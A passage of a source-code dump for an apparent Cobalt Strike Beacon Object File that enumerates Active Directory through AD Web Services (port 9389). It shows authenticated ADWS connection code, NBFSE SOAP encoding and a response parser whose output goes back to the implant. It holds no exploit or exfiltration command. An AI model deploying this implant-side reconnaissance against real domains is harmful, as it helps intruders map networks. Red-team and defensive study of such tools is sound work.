                DWORD searchStart = (dnInfos[i].offset > 2000) ? dnInfos[i].offset - 2000 : 0;

                if (i > 0)
                {
                    DWORD prevDNOffset = dnInfos[i - 1].offset;
                    if (searchStart < prevDNOffset)
                    {
                        searchStart = prevDNOffset + 100;
                    }
                }

                BOOL foundStart = FALSE;
                for (DWORD k = dnInfos[i].offset; k > searchStart; k--)
                {
                    if (data[k] == 0x01)
                    {
                        BOOL foundObjectMarker = FALSE;
                        for (DWORD m = k; m < k + 200 && m < dnInfos[i].offset; m++)
                        {
                            if ((m + 11 < dataLen && MSVCRT$memcmp(data + m, "objectClass", 11) == 0))
                            {
                                foundObjectMarker = TRUE;
                                objectStart = k + 1;
                                foundStart = TRUE;
                                break;
                            }
                        }
                        if (foundObjectMarker)
                            break;
                    }
                }

                if (!foundStart)
                {
                    objectStart = searchStart;
                }

                objectStarts[objectStartCount++] = objectStart;
            }
        }

        intFree(dnInfos);
    }

    // Sort object starts to ensure they're in order
    for (DWORD i = 0; i < objectStartCount - 1; i++)
    {
        for (DWORD j = i + 1; j < objectStartCount; j++)
        {
            if (objectStarts[i] > objectStarts[j])
            {
                DWORD temp = objectStarts[i];
                objectStarts[i] = objectStarts[j];
                objectStarts[j] = temp;
            }
        }
    }

    // Create boundaries for each object
    for (DWORD i = 0; i < objectStartCount && boundaryCount < maxBoundaries; i++)
    {
        boundaries[boundaryCount].start = objectStarts[i];

        // Set end to next object start or data end
        if (i + 1 < objectStartCount)
        {
            boundaries[boundaryCount].end = objectStarts[i + 1];
        }
        else
        {
            boundaries[boundaryCount].end = dataLen;
        }

        boundaryCount++;
    }

    intFree(objectStarts);
    return boundaryCount;
}

BOOL ParsePullResponse(BYTE *response, DWORD responseLen, const char *attrFilter, BOOL *hasMore,
                       DWORD *objectsInThisPull)
{
    static DWORD totalObjectCount = 0;
    DWORD objectCount = 0;

    *hasMore = TRUE;

    // Look for EndOfSequence marker patterns
    const char *endSeqPatterns[] = {
        "\x01\x0B\x0F"
        "EndOfSequence", // 13 bytes
        "\x01\x01\x0B\x0F"
        "EndOfSequence", // 14 bytes
        "\x01\x01\x01\x0B\x0F"
        "EndOfSequence" // 23 bytes (extra 0x01s seen in some responses)
    };

    BOOL foundEndOfSequence = FALSE;
    for (int p = 0; p < 3; p++)
    {
        const char *pattern = endSeqPatterns[p];
        DWORD patLen = (p == 0) ? 13 : (p == 1) ? 14 : 23;

        // Only search in the last portion of the response
        DWORD searchStart = (responseLen > 1000) ? responseLen - 1000 : 0;

        for (DWORD i = searchStart; i + patLen <= responseLen; i++)
        {
            if (MSVCRT$memcmp(response + i, pattern, patLen) == 0)
            {
                *hasMore = FALSE;
                foundEndOfSequence = TRUE;
                break;
            }
        }
        if (foundEndOfSequence)
            break;
    }

    // Find object boundaries
    OBJECT_BOUNDARY *boundaries = (OBJECT_BOUNDARY *)intAlloc(sizeof(OBJECT_BOUNDARY) * 5000);
    if (!boundaries)
        return FALSE;

    DWORD boundaryCount = FindObjectBoundaries(response, responseLen, boundaries, 5000);
    objectCount = boundaryCount;
    totalObjectCount += objectCount;

    if (objectCount == 0)
    {
        // No objects found - check response size to determine if its done
        if (responseLen < 600)
        {
            // Small response with no objects indicates end
            *hasMore = FALSE;
            BeaconPrintf(CALLBACK_OUTPUT, "[*] No more objects (empty response of %d bytes)", responseLen);
        }
        else
        {
            // Large response with no objects might be an error
            BeaconPrintf(CALLBACK_OUTPUT, "[!] No objects found in large response (%d bytes) - may be parsing error",
                         responseLen);
        }
        intFree(boundaries);
        return TRUE;
    }

    if (totalObjectCount == objectCount)
    {
        internal_printf("Results:\n\n");
        printoutput(FALSE);
    }

    // Parse each object
    for (DWORD objIdx = 0; objIdx < boundaryCount; objIdx++)
    {
        // Create a temporary buffer for an object
        OutputBuffer outBuf;
        OutputInit(&outBuf);

        OutputPrintf(&outBuf, "--------------------\n");

        // Find the DN for this object by looking within its boundaries
        char objectDN[256] = {0};
        DWORD searchStart = boundaries[objIdx].start;
        DWORD searchEnd = boundaries[objIdx].end;

        // Validate boundaries
        if (searchStart >= responseLen || searchEnd > responseLen || searchStart >= searchEnd)
        {
            OutputPrintf(&outBuf, "\n[ERROR] Invalid boundaries for object %d: start=%d, end=%d, responseLen=%d",
                         objIdx, searchStart, searchEnd, responseLen);
            OutputFlush(&outBuf, objIdx);
            continue;
        }

        for (DWORD i = searchStart; i < searchEnd && i < responseLen - 20; i++)
        {
            if ((response[i] == 0x98 || response[i] == 0x99) && i + 1 < responseLen)
            {
                BYTE textLen = response[i + 1];
                if (textLen > 10 && textLen < 200 && i + 2 + textLen <= responseLen)
                {
                    char textValue[256];
                    MSVCRT$memcpy(textValue, response + i + 2, textLen);
                    textValue[textLen] = '\0';

                    if ((MSVCRT$strstr(textValue, "CN=") || MSVCRT$strstr(textValue, "cn=")) &&
                        (MSVCRT$strstr(textValue, "DC=") || MSVCRT$strstr(textValue, "dc=")))
                    {
                        BOOL isDN = FALSE;
                        for (DWORD k = (i > 200) ? i - 200 : searchStart; k < i; k++)
                        {
                            if (k + 17 < i && MSVCRT$memcmp(response + k, "distinguishedName", 17) == 0)
                            {
                                isDN = TRUE;
                                break;
                            }
                        }
                        if (isDN)
                        {
                            MSVCRT$strcpy(objectDN, textValue);
                            break;
                        }
                    }
                }
            }
        }

        // Parse attribute filter if provided
        if (attrFilter && MSVCRT$strlen(attrFilter) > 0)
        {
            ATTRIBUTE_ENTRY *attrs = (ATTRIBUTE_ENTRY *)intAlloc(sizeof(ATTRIBUTE_ENTRY) * 200);
            if (!attrs)
            {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate memory for attributes");
                continue;
            }

            DWORD attrCount =
                DiscoverAttributesInObject(response, boundaries[objIdx].start, boundaries[objIdx].end, attrs, 200);

            if (attrCount > 0)
            {
                // Split comma-separated attribute names
                char filterCopy[256];
                MSVCRT$strncpy(filterCopy, attrFilter, 255);
                filterCopy[255] = '\0';

                char *filterAttrs[50];
                DWORD filterCount = 0;
                char *token = MSVCRT$strtok(filterCopy, ",");

                while (token != NULL && filterCount < 50)
                {
                    while (*token == ' ')
                        token++;
                    filterAttrs[filterCount++] = token;
                    token = MSVCRT$strtok(NULL, ",");
                }

                // Display only filtered attributes
                for (DWORD f = 0; f < filterCount; f++)
                {
                    for (DWORD i = 0; i < attrCount; i++)
                    {
                        if (MSVCRT$_stricmp(attrs[i].name, filterAttrs[f]) == 0)
                        {
                            OutputPrintf(&outBuf, "%s: %s\n", attrs[i].name, attrs[i].value);
                            break;
                        }
                    }
                }
            }

            intFree(attrs);
        }
        else
        {
            char (*attributeNames)[64] = (char (*)[64])intAlloc(200 * 64);
            if (!attributeNames)
            {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate memory for attribute names");
                continue;
            }

            DWORD nameCount =
                DiscoverAttributeNames(response, boundaries[objIdx].start, boundaries[objIdx].end, attributeNames, 200);

            if (nameCount > 0)
            {
                char *attrValue = (char *)intAlloc(4096);
                if (!attrValue)
                {
                    BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate memory for attribute value");
                    intFree(attributeNames);
                    continue;
                }

                for (DWORD i = 0; i < nameCount; i++)
                {
                    MSVCRT$memset(attrValue, 0, 4096);

                    if (ExtractAttributeUniversal(response + boundaries[objIdx].start,
                                                  boundaries[objIdx].end - boundaries[objIdx].start, attributeNames[i],
                                                  attrValue, 4096))
                    {
                        OutputPrintf(&outBuf, "%s: %s\n", attributeNames[i], attrValue);
                    }
                }

                intFree(attrValue);
            }
            else
            {
                OutputPrintf(&outBuf, "\n[No attributes discovered]\n");
            }

            intFree(attributeNames);
        }

        OutputFlush(&outBuf, objIdx);
    }

    intFree(boundaries);

    if (objectsInThisPull)
    {
        *objectsInThisPull = objectCount;
    }

    return TRUE;
}

#endif


================================================
FILE: AD-BOF/adwssearch/adws_search.c
================================================
#define SECURITY_WIN32
#include "beacon.h"
#include "bofdefs.h"
#include <dsgetdc.h>
#include <lm.h>
#include <rpc.h>
#include <security.h>

#include "adws_parser.h"
#include "nbfse.h"
#include "nmf.h"
#include "nns.h"

#ifdef BOF
void ___chkstk_ms(void){}
void __chkstk_ms(void){}
#endif

#ifndef bufsize
#define bufsize 10485760
#endif

char *output __attribute__((section(".data"))) = 0;
DWORD currentoutsize __attribute__((section(".data"))) = 0;
HANDLE trash __attribute__((section(".data"))) = NULL;
BOOL g_useBeaconFormat __attribute__((section(".data"))) = -1;

#ifdef BOF
int bofstart()
{
    output = (char *)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void printoutput(BOOL done)
{
    char *msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    MSVCRT$memset(output, 0, bufsize);
    if (done)
    {
        MSVCRT$free(output);
        output = NULL;
    }
}

void internal_printf(const char *format, ...)
{
    int buffersize = 0;
    int transfersize = 0;
    char *curloc = NULL;
    char *intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args);
    va_end(args);

    if (buffersize == -1)
        return;

    char *transferBuffer = (char *)intAlloc(bufsize);
    intBuffer = (char *)intAlloc(buffersize);
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args);
    va_end(args);
    if (buffersize + currentoutsize < bufsize)
    {
        MSVCRT$memcpy(output + currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else
    {
        curloc = intBuffer;
        while (buffersize > 0)
        {
            transfersize = bufsize - currentoutsize;
            if (buffersize < transfersize)
            {
                transfersize = buffersize;
            }
            MSVCRT$memcpy(output + currentoutsize, curloc, transfersize);
            currentoutsize += transfersize;
            if (currentoutsize == bufsize)
            {
                printoutput(FALSE);
            }
            MSVCRT$memset(transferBuffer, 0, transfersize);
            curloc += transfersize;
            buffersize -= transfersize;
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}
#else
#define bofstart()
#define printoutput(x)
#define internal_printf printf
#endif

#ifdef BOF
void DetectBeaconFormatSupport()
{
    if (g_useBeaconFormat != -1)
        return;

    formatp test;
    BeaconFormatAlloc(&test, 1024);
    BeaconFormatPrintf(&test, "test");
    char *testOutput = BeaconFormatToString(&test, NULL);
    g_useBeaconFormat = (testOutput != NULL && test.original != NULL) ? 1 : 0;
    BeaconFormatFree(&test);
}

void OutputInit(OutputBuffer *out)
{
    out->initialized = FALSE;
    if (g_useBeaconFormat)
    {
        BeaconFormatAlloc(&out->buffer, 64 * 1024);
        out->initialized = TRUE;
    }
}

void OutputPrintf(OutputBuffer *out, const char *format, ...)
{
    va_list args;
    va_start(args, format);

    if (g_useBeaconFormat && out->initialized)
    {
        char temp[4096];
        MSVCRT$vsnprintf(temp, sizeof(temp), format, args);
        BeaconFormatPrintf(&out->buffer, "%s", temp);
    }
    else
    {
        char temp[4096];
        MSVCRT$vsnprintf(temp, sizeof(temp), format, args);
        internal_printf("%s", temp);
    }

    va_end(args);
}

void OutputFlush(OutputBuffer *out, DWORD objIdx)
{
    if (g_useBeaconFormat && out->initialized)
    {
        char *objectOutput = BeaconFormatToString(&out->buffer, NULL);
        if (objectOutput)
        {
            internal_printf("%s", objectOutput);
        }
        BeaconFormatFree(&out->buffer);
    }

    if ((objIdx + 1) % 5 == 0)
    {
        printoutput(FALSE);
    }
}
#endif

void Phase5_FullEnumeration(const char *target, const char *ldapFilter, const char *attrFilter);
BOOL ConnectToADWS(SOCKET *pSocket, const char *target);

BOOL GetDistinguishedName(char *distinguishedName, DWORD size)
{
    char tempBuffer[512];
    ULONG ulSize = sizeof(tempBuffer);

    if (!SECUR32$GetUserNameExA(NameFullyQualifiedDN, tempBuffer, &ulSize))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to retrieve user's distinguished name");
        return FALSE;
    }

    char *dcPart = MSVCRT$strstr(tempBuffer, "DC=");
    if (!dcPart)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to find DC= in distinguished name");
        return FALSE;
    }

    MSVCRT$strncpy(distinguishedName, dcPart, size - 1);
    distinguishedName[size - 1] = '\0';

    return TRUE;
}

BOOL GetDomainController(char *dcName, DWORD size)
{
    PDOMAIN_CONTROLLER_INFO pdcInfo = NULL;
    DWORD dwRet = 0;

    dwRet = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo);

    if (dwRet != ERROR_SUCCESS)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to identify Domain Controller. Are we domain joined?");
        return FALSE;
    }

    if (!pdcInfo || !pdcInfo->DomainControllerName)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] DsGetDcNameA returned no DC information");
        if (pdcInfo)
            NETAPI32$NetApiBufferFree(pdcInfo);
        return FALSE;
    }

    const char *dcAddress = pdcInfo->DomainControllerAddress;
    if (dcAddress[0] == '\\' && dcAddress[1] == '\\')
    {
        dcAddress += 2;
    }

    MSVCRT$strncpy(dcName, dcAddress, size - 1);
    dcName[size - 1] = '\0';

    NETAPI32$NetApiBufferFree(pdcInfo);
    return TRUE;
}

BOOL DeriveBaseDN(const char *target, char *baseDN, DWORD baseDNSize);

BOOL DeriveBaseDN(const char *target, char *baseDN, DWORD baseDNSize)
{

    if (!target || !baseDN || baseDNSize < 10)
        return FALSE;

    baseDN[0] = '\0';

    BOOL isIP = TRUE;
    for (const char *p = target; *p; p++)
    {
        if ((*p < '0' || *p > '9') && *p != '.')
        {
            isIP = FALSE;
            break;
        }
    }

    if (isIP)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Cannot derive base DN from IP address. Please use hostname.");
        return FALSE;
    }

    const char *domainStart = MSVCRT$strchr(target, '.');
    if (!domainStart)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Invalid target format. Expected: hostname.domain.tld");
        return FALSE;
    }

    domainStart++;

    char tempDomain[256];
    MSVCRT$strncpy(tempDomain, domainStart, 255);
    tempDomain[255] = '\0';

    baseDN[0] = '\0';

    char *component = MSVCRT$strtok(tempDomain, ".");
    BOOL first = TRUE;

    while (component != NULL)
    {
        if (!first)
        {
            MSVCRT$strcat(baseDN, ",");
        }
        MSVCRT$strcat(baseDN, "DC=");
        MSVCRT$strcat(baseDN, component);
        first = FALSE;
        component = MSVCRT$strtok(NULL, ".");
    }

    return (MSVCRT$strlen(baseDN) > 0);
}

BOOL ConnectToADWS(SOCKET *pSocket, const char *target)
{
    struct addrinfo hints;
    struct addrinfo *result = NULL;
    struct addrinfo *ptr = NULL;
    int ret;

    MSVCRT$memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;

    ret = WS2_32$getaddrinfo((char *)target, "9389", &hints, &result);
    if (ret != 0)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] getaddrinfo failed: %d", ret);
        return FALSE;
    }

    for (ptr = result; ptr != NULL; ptr = ptr->ai_next)
    {
        *pSocket = WS2_32$socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol);
        if (*pSocket == INVALID_SOCKET)
        {
            continue;
        }

        ret = WS2_32$connect(*pSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
        if (ret == SOCKET_ERROR)
        {
            WS2_32$closesocket(*pSocket);
            *pSocket = INVALID_SOCKET;
            continue;
        }
        break;
    }

    WS2_32$freeaddrinfo(result);
    return (*pSocket != INVALID_SOCKET);
}

#ifdef BOF
VOID go(IN PCHAR Buffer, IN ULONG Length)
{
    if (!bofstart()) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize output buffer");
        return;
    }

    DetectBeaconFormatSupport();

    datap parser = {};
    BeaconDataParse(&parser, Buffer, Length);

    char *ldapFilter = BeaconDataExtract(&parser, NULL);
    char *attrFilter = BeaconDataExtract(&parser, NULL);
    char *target     = BeaconDataExtract(&parser, NULL);
    char *baseDN     = BeaconDataExtract(&parser, NULL);

    BOOL targetAuto = FALSE;
    BOOL dnAuto     = FALSE;

    if (ldapFilter == 0 || attrFilter == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Note: arguments unknown");
        return;
    }

    if( target && target[0] == 0 ) {
        targetAuto = TRUE;
        target = (char *) intAlloc(256);

        if (!GetDomainController(target, 256))
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to auto-discover domain controller");
            intFree(target);
            return;
        }
    }

    if ( baseDN && baseDN[0] == 0 ) {
        dnAuto = TRUE;
        baseDN = (char *) intAlloc(512);

        if (!GetDistinguishedName(baseDN, 512)) {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Falling back to deriving DN from target hostname...\n");
            if (!DeriveBaseDN(target, baseDN, 512)) {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to derive base DN from target\n");
                goto cleanup_params;
            }
        }
    }

    internal_printf("[*] Filter:     %s\n", ldapFilter);
    internal_printf("[*] Attributes: %s\n", attrFilter ? attrFilter : "ALL");
    internal_printf("[*] Base DN:    %s\n", baseDN);
    internal_printf("[*] Target DC:  %s\n", target);

    CONNECTION_CONTEXT ctx = {0};
    ctx.socket = INVALID_SOCKET;
    ctx.hCred.dwLower = 0;
    ctx.hCred.dwUpper = 0;
    ctx.hContext.dwLower = 0;
    ctx.hContext.dwUpper = 0;

    int ret = WS2_32$WSAStartup(MAKEWORD(2, 2), &ctx.wsaData);
    if (ret != 0)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] WSAStartup failed: %d\n", ret);
        return;
    }

    if (!ConnectToADWS(&ctx.socket, target))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to connect to ADWS\n");
        goto cleanup_params;
    }
    internal_printf("[+] Connected to ADWS\n");

    if (!SendNMFHandshake(ctx.socket, target))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] NMF handshake failed\n");
        goto cleanup_params;
    }

    if (!PerformNNSHandshake(&ctx, target))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] NNS authentication failed\n");
        goto cleanup_params;
    }
    internal_printf("[+] Authenticated\n");

    NBFSE_BUFFER *nbfseBuffer = NBFSEBufferCreate(8192);
    if (!nbfseBuffer)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create NBFSE buffer");
        goto cleanup_params;
    }

    if (!BuildEnumerateRequest(nbfseBuffer, ldapFilter, baseDN, target, attrFilter))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to build enumerate request");
        NBFSEBufferFree(nbfseBuffer);
        goto cleanup_params;
    }

    if (!SendADWSMessage(&ctx, nbfseBuffer->data, nbfseBuffer->size))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to send ADWS message");
        NBFSEBufferFree(nbfseBuffer);
        goto cleanup_params;
    }

    PBYTE response = NULL;
    DWORD responseLen = 0;
    if (!NNSReceiveEncrypted(&ctx, &response, &responseLen))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to receive response");
        NBFSEBufferFree(nbfseBuffer);
        goto cleanup_params;
    }

    PBYTE nbfsePayload = NULL;
    DWORD nbfseLen = 0;
    if (!UnwrapNMFEnvelope(response, responseLen, &nbfsePayload, &nbfseLen))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to unwrap NMF envelope");
        intFree(response);
        NBFSEBufferFree(nbfseBuffer);
        goto cleanup_params;
    }

    char *enumerationContext = (char *)intAlloc(256);
    if (!enumerationContext)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate memory for enumeration context");
        intFree(response);
        NBFSEBufferFree(nbfseBuffer);
        goto cleanup_params;
    }

    enumerationContext[0] = '\0';
    if (!ParseEnumerateResponse(nbfsePayload, nbfseLen, enumerationContext, 256))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse enumeration context");
        intFree(response);
        NBFSEBufferFree(nbfseBuffer);
        intFree(enumerationContext);
        goto cleanup_params;
    }

    intFree(response);
    NBFSEBufferFree(nbfseBuffer);

    internal_printf("[*] Retrieving objects...\n");

    BOOL hasMore = TRUE;
    int pullCount = 0;
    int totalObjectsRetrieved = 0;

    while (hasMore)
    {
        nbfseBuffer = NBFSEBufferCreate(1024);
        if (!nbfseBuffer)
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create buffer for pull request");
            goto cleanup_params;
        }

        if (!BuildPullRequest(nbfseBuffer, enumerationContext, 256, target))
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to build pull request");
            NBFSEBufferFree(nbfseBuffer);
            goto cleanup_params;
        }

        if (!SendADWSMessage(&ctx, nbfseBuffer->data, nbfseBuffer->size))
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to send pull request");
            NBFSEBufferFree(nbfseBuffer);
            goto cleanup_params;
        }
        NBFSEBufferFree(nbfseBuffer);

        response = NULL;
        responseLen = 0;
        if (!NNSReceiveEncrypted(&ctx, &response, &responseLen))
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to receive pull response");
            goto cleanup_params;
        }

        nbfsePayload = NULL;
        nbfseLen = 0;
        if (!UnwrapNMFEnvelope(response, responseLen, &nbfsePayload, &nbfseLen))
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to unwrap pull response");
            intFree(response);
            goto cleanup_params;
        }

        DWORD objectsInThisPull = 0;
        if (!ParsePullResponse(nbfsePayload, nbfseLen, attrFilter, &hasMore, &objectsInThisPull))
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse pull response");
            intFree(response);
            goto cleanup_params;
        }

        totalObjectsRetrieved += objectsInThisPull;
        intFree(response);
        pullCount++;
    }

    internal_printf("\nRetrieved %d results total\n", totalObjectsRetrieved);

    if (enumerationContext)
        intFree(enumerationContext);

cleanup:
    if (ctx.socket != INVALID_SOCKET)
        WS2_32$closesocket(ctx.socket);

    if (ctx.hContext.dwLower || ctx.hContext.dwUpper)
        SECUR32$DeleteSecurityContext(&ctx.hContext);

    if (ctx.hCred.dwLower || ctx.hCred.dwUpper)
        SECUR32$FreeCredentialsHandle(&ctx.hCred);

    WS2_32$WSACleanup();

cleanup_params:
    if (target && targetAuto)
        intFree(target);
    if (baseDN && dnAuto)
        intFree(baseDN);

    printoutput(TRUE);
}
#endif


================================================
FILE: AD-BOF/adwssearch/nbfse.h
================================================
/*
 * nbfse.h - .NET Binary Format: SOAP Encoding
 *
 * Functions for encoding SOAP messages in Microsoft's binary XML format (NBFSE)
 * used by Active Directory Web Services (ADWS) protocol.
 */

#ifndef NBFSE_H
#define NBFSE_H

#ifdef BOF
#include "bofdefs.h"

DECLSPEC_IMPORT RPC_STATUS WINAPI RPCRT4$UuidCreate(UUID *);
#else
#include <rpc.h>
#include <windows.h>
#endif

#define NBFSE_END_ELEMENT 0x01
#define NBFSE_SHORT_ATTRIBUTE 0x04
#define NBFSE_ATTRIBUTE 0x05
#define NBFSE_SHORT_XMLNS_ATTRIBUTE 0x08
#define NBFSE_XMLNS_ATTRIBUTE 0x09
#define NBFSE_DICTIONARY_XMLNS_ATTRIBUTE 0x0B
#define NBFSE_PREFIX_DICTIONARY_ATTRIBUTE_S 0x1E
#define NBFSE_ELEMENT 0x41
#define NBFSE_PREFIX_DICTIONARY_ELEMENT_A 0x44
#define NBFSE_PREFIX_DICTIONARY_ELEMENT_S 0x56
#define NBFSE_BOOL_TEXT_TRUE 0x86
#define NBFSE_CHARS8_TEXT 0x98
#define NBFSE_CHARS8_TEXT_WITH_END_ELEMENT 0x99
#define NBFSE_BYTES8_TEXT 0x9E
#define NBFSE_BYTES8_TEXT_WITH_END_ELEMENT 0x9F
#define NBFSE_DICTIONARY_TEXT 0xAA
#define NBFSE_DICTIONARY_TEXT_WITH_END_ELEMENT 0xAB
#define NBFSE_UNIQUE_ID_TEXT 0xAC

#define DICT_ENVELOPE 0x02
#define DICT_HEADER 0x08
#define DICT_BODY 0x0E
#define DICT_ACTION 0x0A
#define DICT_TO 0x0C
#define DICT_MESSAGEID 0x1A
#define DICT_REPLYTO 0x2C
#define DICT_ADDRESS 0x2A
#define DICT_MUSTUNDERSTAND 0x00

typedef struct
{
    BYTE *data;
    DWORD size;
    DWORD capacity;
} NBFSE_BUFFER;

NBFSE_BUFFER *NBFSEBufferCreate(DWORD initialSize);
void NBFSEBufferFree(NBFSE_BUFFER *buf);
BOOL NBFSEBufferAppend(NBFSE_BUFFER *buf, const BYTE *data, DWORD dataLen);
BOOL NBFSEBufferAppendByte(NBFSE_BUFFER *buf, BYTE b);

BOOL NBFSEWriteMultiByteInt31(NBFSE_BUFFER *buf, DWORD value);
BOOL NBFSEWriteChars8Text(NBFSE_BUFFER *buf, const char *text, BOOL withEndElement);
BOOL NBFSEWriteDictionaryText(NBFSE_BUFFER *buf, BYTE dictId, BOOL withEndElement);
BOOL NBFSEWriteUniqueIdText(NBFSE_BUFFER *buf, const UUID *uuid);
BOOL NBFSEWriteElement(NBFSE_BUFFER *buf, const char *prefix, const char *name);
BOOL NBFSEWriteShortAttribute(NBFSE_BUFFER *buf, const char *name);
BOOL NBFSEWriteXmlnsAttribute(NBFSE_BUFFER *buf, const char *prefix, const char *ns);
BOOL NBFSEWriteDictionaryXmlnsAttribute(NBFSE_BUFFER *buf, const char *prefix, BYTE nsDict);

BOOL BuildEnumerateRequest(NBFSE_BUFFER *buf, const char *ldapFilter, const char *baseDN, const char *targetHost,
                           const char *attrFilter);
BOOL BuildPullRequest(NBFSE_BUFFER *buf, const char *enumContext, DWORD maxElements, const char *targetHost);

NBFSE_BUFFER *NBFSEBufferCreate(DWORD initialSize)
{
    NBFSE_BUFFER *buf = (NBFSE_BUFFER *)intAlloc(sizeof(NBFSE_BUFFER));
    if (!buf)
        return NULL;

    buf->data = (BYTE *)intAlloc(initialSize);
    if (!buf->data)
    {
        intFree(buf);
        return NULL;
    }

    buf->size = 0;
    buf->capacity = initialSize;
    return buf;
}

void NBFSEBufferFree(NBFSE_BUFFER *buf)
{
    if (buf)
    {
        if (buf->data)
            intFree(buf->data);
        intFree(buf);
    }
}

BOOL NBFSEBufferAppend(NBFSE_BUFFER *buf, const BYTE *data, DWORD dataLen)
{
    if (buf->size + dataLen > buf->capacity)
    {
        DWORD newCapacity = buf->capacity * 2;
        while (newCapacity < buf->size + dataLen)
        {
            newCapacity *= 2;
        }

        BYTE *newData = (BYTE *)intAlloc(newCapacity);
        if (!newData)
            return FALSE;

        MSVCRT$memcpy(newData, buf->data, buf->size);
        intFree(buf->data);
        buf->data = newData;
        buf->capacity = newCapacity;
    }

    MSVCRT$memcpy(buf->data + buf->size, data, dataLen);
    buf->size += dataLen;
    return TRUE;
}

BOOL NBFSEBufferAppendByte(NBFSE_BUFFER *buf, BYTE b)
{
    return NBFSEBufferAppend(buf, &b, 1);
}

BOOL NBFSEWriteMultiByteInt31(NBFSE_BUFFER *buf, DWORD value)
{
    if (value < 0x80)
    {
        return NBFSEBufferAppendByte(buf, (BYTE)value);
    }
    else if (value < 0x4000)
    {
        BYTE bytes[2];
        bytes[0] = (BYTE)(0x80 | (value & 0x7F));
        bytes[1] = (BYTE)(value >> 7);
        return NBFSEBufferAppend(buf, bytes, 2);
    }
    else if (value < 0x200000)
    {
        BYTE bytes[3];
        bytes[0] = (BYTE)(0x80 | (value & 0x7F));
        bytes[1] = (BYTE)(0x80 | ((value >> 7) & 0x7F));
        bytes[2] = (BYTE)(value >> 14);
        return NBFSEBufferAppend(buf, bytes, 3);
    }
    else if (value < 0x10000000)
    {
        BYTE bytes[4];
        bytes[0] = (BYTE)(0x80 | (value & 0x7F));
        bytes[1] = (BYTE)(0x80 | ((value >> 7) & 0x7F));
        bytes[2] = (BYTE)(0x80 | ((value >> 14) & 0x7F));
        bytes[3] = (BYTE)(value >> 21);
        return NBFSEBufferAppend(buf, bytes, 4);
    }
    else
    {
        BYTE bytes[5];
        bytes[0] = (BYTE)(0x80 | (value & 0x7F));
        bytes[1] = (BYTE)(0x80 | ((value >> 7) & 0x7F));
        bytes[2] = (BYTE)(0x80 | ((value >> 14) & 0x7F));
        bytes[3] = (BYTE)(0x80 | ((value >> 21) & 0x7F));
        bytes[4] = (BYTE)(value >> 28);
        return NBFSEBufferAppend(buf, bytes, 5);
    }
}

BOOL NBFSEWriteChars8Text(NBFSE_BUFFER *buf, const char *text, BOOL withEndElement)
{
    DWORD len = MSVCRT$strlen(text);
    if (len > 255)
        return FALSE;

    BYTE recordType = withEndElement ? NBFSE_CHARS8_TEXT_WITH_END_ELEMENT : NBFSE_CHARS8_TEXT;
    if (!NBFSEBufferAppendByte(buf, recordType))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, (BYTE)len))
        return FALSE;
    return NBFSEBufferAppend(buf, (const BYTE *)text, len);
}

BOOL NBFSEWriteDictionaryText(NBFSE_BUFFER *buf, BYTE dictId, BOOL withEndElement)
{
    BYTE recordType = withEndElement ? NBFSE_DICTIONARY_TEXT_WITH_END_ELEMENT : NBFSE_DICTIONARY_TEXT;
    if (!NBFSEBufferAppendByte(buf, recordType))
        return FALSE;
    return NBFSEBufferAppendByte(buf, dictId);
}

BOOL NBFSEWriteUniqueIdText(NBFSE_BUFFER *buf, const UUID *uuid)
{
    if (!NBFSEBufferAppendByte(buf, NBFSE_UNIQUE_ID_TEXT))
        return FALSE;
    return NBFSEBufferAppend(buf, (const BYTE *)uuid, 16);
}

BOOL NBFSEWriteElement(NBFSE_BUFFER *buf, const char *prefix, const char *name)
{
    DWORD prefixLen = MSVCRT$strlen(prefix);
    DWORD nameLen = MSVCRT$strlen(name);

    if (!NBFSEBufferAppendByte(buf, NBFSE_ELEMENT))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, (BYTE)prefixLen))
        return FALSE;
